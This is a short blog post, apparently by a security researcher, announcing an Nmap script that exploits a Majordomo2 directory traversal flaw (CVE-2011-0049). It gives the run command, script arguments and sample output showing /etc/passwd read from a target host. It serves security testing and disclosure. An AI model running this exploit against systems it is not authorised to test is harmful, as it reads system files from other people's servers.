calderpwn

Exploiting Majordomo2 with Nmap

<![CDATA[

This is my nmap script http-majordomo2-dir-traversal, it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it  Smile

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT STATE SERVICE 

  80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
|
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile – Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri – URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile – If set it saves the remote file to this location.

 

Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse

]]>

Leave a comment

cat /etc/about-me

@calderpwn spends peaceful days in Cozumel, a beautiful island in the Caribbean, working on remote projects, learning new technologies, developing new tools, or simply enjoying the beach.

Join the mailing list

Stay updated with the latest tips and other news of my developments by joining the newsletter. It is very low volume, I promise :)

Categories

Tags

802.11 android azure ble book books calderpwn catsniffer Conferences cozumel General GSoC hopper infosec ios iot iot hacking iot security mexico mobile security nmap nordic nostarch iot hacking oneplus owasp owasp latam tour owasp mstg owasp riviera maya Publications Research reversing scripting source code auditing sql injection tips Tutorials wifi windows wireshark

Recent Posts

Favs

DragonJAR

PWNLAB

Websec

ThreatPatrol